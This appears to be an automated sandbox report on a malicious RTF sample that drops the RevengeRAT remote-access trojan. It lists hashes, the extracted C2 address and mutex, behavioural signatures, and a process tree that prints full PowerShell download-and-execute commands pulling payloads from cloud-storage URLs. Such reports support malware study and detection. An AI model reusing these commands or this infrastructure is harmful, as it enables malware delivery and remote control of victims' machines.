Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
29-07-2024 21:24
Static task
static1
Behavioral task
behavioral1
Sample
6122d96e83f0c0dad6d1ed8ab22c60b3_JaffaCakes118.rtf
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
6122d96e83f0c0dad6d1ed8ab22c60b3_JaffaCakes118.rtf
Resource
win10v2004-20240709-en
General
-
Target
6122d96e83f0c0dad6d1ed8ab22c60b3_JaffaCakes118.rtf
-
Size
429KB
-
MD5
6122d96e83f0c0dad6d1ed8ab22c60b3
-
SHA1
1c9fb09da9a5673b2c821657d1d50440eac79ed6
-
SHA256
3fcab0addd17f497cf4a7bd90ca5797520a26d98d8fd87b3df5f539cf8cf41bb
-
SHA512
943086f85de1d466dffb9e9ce1b4ae4ec18139373a4be92fcbc5e91b3e9edb38fbbcc5b3d9c1522af124870f1db9e750f52b2acc9093c4dde518fc9f2de86560
-
SSDEEP
3072:qxmwANc/nIwANc/nbwANc/nUwANc/nTwANc/nYwANc/ntwANc/n19F:sA29A2cA2ZA20A2NA2+A2nF
Malware Config
Extracted
https://storage.googleapis.com/wzukusers/user-34654398/documents/5c8fcdc868cf8Nau4eqD/2019
Extracted
https://storage.googleapis.com/wzukusers/user-34654398/documents/5c8fc8d91e717XQDt0y4/ServidorFUDIGOR
Extracted
revengerat
KEROLYN S2
bozok1.duckdns.org:333
RV_MUTEX-iNSnIELecwCkj
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.execmd.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2772 2732 cmd.exe EXCEL.EXE Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2644 2732 cmd.exe EXCEL.EXE -
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
RevengeRat Executable 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2184-35-0x0000000000280000-0x0000000000288000-memory.dmp revengerat -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 4 2008 powershell.exe 5 1704 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 1704 powershell.exe 2008 powershell.exe -
Downloads MZ/PE file
-
Drops startup file 1 IoCs
Processes:
WScript.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.js WScript.exe -
Executes dropped EXE 2 IoCs
Processes:
taskgen.exeSystem32.exepid process 2184 taskgen.exe 2784 System32.exe -
Loads dropped DLL 1 IoCs
Processes:
powershell.exepid process 2008 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
taskkill.exetaskkill.exeEXCEL.EXEtaskkill.exepowershell.execmd.exetaskkill.exeWINWORD.EXEcmd.exePING.EXEPING.EXEpowershell.exeWScript.exeEXCEL.EXEEXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
PING.EXEcmd.execmd.exePING.EXEpid process 1644 PING.EXE 2772 cmd.exe 2644 cmd.exe 1980 PING.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
taskgen.exeSystem32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 taskgen.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskgen.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 System32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString System32.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEEXCEL.EXEEXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1996 taskkill.exe 2632 taskkill.exe 2652 taskkill.exe 1036 taskkill.exe -
Runs ping.exe 1 TTPs 2 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 2092 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 1704 powershell.exe 2008 powershell.exe 1704 powershell.exe 1704 powershell.exe 2008 powershell.exe 2008 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exepowershell.exetaskgen.exeSystem32.exedescription pid process Token: SeDebugPrivilege 2632 taskkill.exe Token: SeDebugPrivilege 2652 taskkill.exe Token: SeDebugPrivilege 1036 taskkill.exe Token: SeDebugPrivilege 1996 taskkill.exe Token: SeDebugPrivilege 1704 powershell.exe Token: SeDebugPrivilege 2008 powershell.exe Token: SeDebugPrivilege 2184 taskgen.exe Token: SeDebugPrivilege 2784 System32.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
WINWORD.EXEEXCEL.EXEEXCEL.EXEEXCEL.EXEpid process 2092 WINWORD.EXE 2092 WINWORD.EXE 2732 EXCEL.EXE 2416 EXCEL.EXE 1664 EXCEL.EXE -
Suspicious use of WriteProcessMemory 55 IoCs
Processes:
WINWORD.EXEEXCEL.EXEcmd.execmd.exepowershell.exepowershell.exetaskgen.exedescription pid process target process PID 2092 wrote to memory of 2852 2092 WINWORD.EXE splwow64.exe PID 2092 wrote to memory of 2852 2092 WINWORD.EXE splwow64.exe PID 2092 wrote to memory of 2852 2092 WINWORD.EXE splwow64.exe PID 2092 wrote to memory of 2852 2092 WINWORD.EXE splwow64.exe PID 2732 wrote to memory of 2772 2732 EXCEL.EXE cmd.exe PID 2732 wrote to memory of 2772 2732 EXCEL.EXE cmd.exe PID 2732 wrote to memory of 2772 2732 EXCEL.EXE cmd.exe PID 2732 wrote to memory of 2772 2732 EXCEL.EXE cmd.exe PID 2732 wrote to memory of 2644 2732 EXCEL.EXE cmd.exe PID 2732 wrote to memory of 2644 2732 EXCEL.EXE cmd.exe PID 2732 wrote to memory of 2644 2732 EXCEL.EXE cmd.exe PID 2732 wrote to memory of 2644 2732 EXCEL.EXE cmd.exe PID 2772 wrote to memory of 2632 2772 cmd.exe taskkill.exe PID 2772 wrote to memory of 2632 2772 cmd.exe taskkill.exe PID 2772 wrote to memory of 2632 2772 cmd.exe taskkill.exe PID 2772 wrote to memory of 2632 2772 cmd.exe taskkill.exe PID 2644 wrote to memory of 2652 2644 cmd.exe taskkill.exe PID 2644 wrote to memory of 2652 2644 cmd.exe taskkill.exe PID 2644 wrote to memory of 2652 2644 cmd.exe taskkill.exe PID 2644 wrote to memory of 2652 2644 cmd.exe taskkill.exe PID 2644 wrote to memory of 1036 2644 cmd.exe taskkill.exe PID 2644 wrote to memory of 1036 2644 cmd.exe taskkill.exe PID 2644 wrote to memory of 1036 2644 cmd.exe taskkill.exe PID 2644 wrote to memory of 1036 2644 cmd.exe taskkill.exe PID 2772 wrote to memory of 1996 2772 cmd.exe taskkill.exe PID 2772 wrote to memory of 1996 2772 cmd.exe taskkill.exe PID 2772 wrote to memory of 1996 2772 cmd.exe taskkill.exe PID 2772 wrote to memory of 1996 2772 cmd.exe taskkill.exe PID 2644 wrote to memory of 1980 2644 cmd.exe PING.EXE PID 2644 wrote to memory of 1980 2644 cmd.exe PING.EXE PID 2644 wrote to memory of 1980 2644 cmd.exe PING.EXE PID 2644 wrote to memory of 1980 2644 cmd.exe PING.EXE PID 2772 wrote to memory of 1644 2772 cmd.exe PING.EXE PID 2772 wrote to memory of 1644 2772 cmd.exe PING.EXE PID 2772 wrote to memory of 1644 2772 cmd.exe PING.EXE PID 2772 wrote to memory of 1644 2772 cmd.exe PING.EXE PID 2772 wrote to memory of 2008 2772 cmd.exe powershell.exe PID 2772 wrote to memory of 2008 2772 cmd.exe powershell.exe PID 2772 wrote to memory of 2008 2772 cmd.exe powershell.exe PID 2772 wrote to memory of 2008 2772 cmd.exe powershell.exe PID 2644 wrote to memory of 1704 2644 cmd.exe powershell.exe PID 2644 wrote to memory of 1704 2644 cmd.exe powershell.exe PID 2644 wrote to memory of 1704 2644 cmd.exe powershell.exe PID 2644 wrote to memory of 1704 2644 cmd.exe powershell.exe PID 1704 wrote to memory of 2260 1704 powershell.exe WScript.exe PID 1704 wrote to memory of 2260 1704 powershell.exe WScript.exe PID 1704 wrote to memory of 2260 1704 powershell.exe WScript.exe PID 1704 wrote to memory of 2260 1704 powershell.exe WScript.exe PID 2008 wrote to memory of 2184 2008 powershell.exe taskgen.exe PID 2008 wrote to memory of 2184 2008 powershell.exe taskgen.exe PID 2008 wrote to memory of 2184 2008 powershell.exe taskgen.exe PID 2008 wrote to memory of 2184 2008 powershell.exe taskgen.exe PID 2184 wrote to memory of 2784 2184 taskgen.exe System32.exe PID 2184 wrote to memory of 2784 2184 taskgen.exe System32.exe PID 2184 wrote to memory of 2784 2184 taskgen.exe System32.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\6122d96e83f0c0dad6d1ed8ab22c60b3_JaffaCakes118.rtf"1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2852
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im excel.exe & taskkill /f /im winword.exe & ping -n 3 localhost & PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://storage.googleapis.com/wzukusers/user-34654398/documents/5c8fc8d91e717XQDt0y4/ServidorFUDIGOR','%TEMP%\taskgen.exe');Start-Process '%TEMP%\taskgen.exe'2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im excel.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2632 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winword.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1996 -
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost3⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1644 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://storage.googleapis.com/wzukusers/user-34654398/documents/5c8fc8d91e717XQDt0y4/ServidorFUDIGOR','C:\Users\Admin\AppData\Local\Temp\taskgen.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\taskgen.exe'3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Users\Admin\AppData\Local\Temp\taskgen.exe"C:\Users\Admin\AppData\Local\Temp\taskgen.exe"4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Users\Admin\AppData\Roaming\System32.exe"C:\Users\Admin\AppData\Roaming\System32.exe"5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:2784 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im excel.exe & taskkill /f /im winword.exe & ping -n 3 localhost & PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://storage.googleapis.com/wzukusers/user-34654398/documents/5c8fcdc868cf8Nau4eqD/2019','%PUBLIC%\.js');Start-Process '%PUBLIC%\.js'2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im excel.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2652 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winword.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1036 -
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost3⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1980 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://storage.googleapis.com/wzukusers/user-34654398/documents/5c8fcdc868cf8Nau4eqD/2019','C:\Users\Public\.js');Start-Process 'C:\Users\Public\.js'3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\.js"4⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:2260
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:2416
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:1664
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5ad4b7204cf5918b0eef7d34e23f17439
SHA144544f940705b9a63d9a0b877728e5ef1181f74d
SHA2564e712c55b7dbad761df921ffaa14e9a160ddeea2c6e07e3cbbfee73b8bab43a0
SHA512840ba22d7f8e4ded19d5880464dff59b51b2d6b2a519f0c24c7b479f5316e1e2ed856136bb7fb1f0f2dcd7274b2111c1001bea4d45308d431cab3dd638374933
-
Filesize
9KB
MD5a9a9d84ef5f6c850be17e5c3ace9e324
SHA1b91bae1c10f8340e89c6a795f3fc389cba4ef336
SHA256b2ce5348dc6f2d43013ff0c5776070ad920eb5ce4a0ad2587deda6b50f31b6ab
SHA512f4eea6e32c0ab50fa052c18548a72272c19d71eebd42a2d5fc634ba5cf325fd20ee717f43d228cff6f3bd5a6ad6c5bde34925c6252a0d8e3869ae1bf101c25ae
-
Filesize
361KB
MD5694088b55e8ccd704bd01ce37123d577
SHA1c256d312404df3aef089d957a44e48030decc139
SHA2560869024a8e1c8d1c12ecedccf9e32ae4702436859c1befa1507075e97362ec6f
SHA5124f458f607472a232b04eb20356ac2bde275c208823aea5b54688bd74dde6c85c6fae735f1fe254b3ae114120bca383124f93fcd7d33be6cace4486158eca4ed0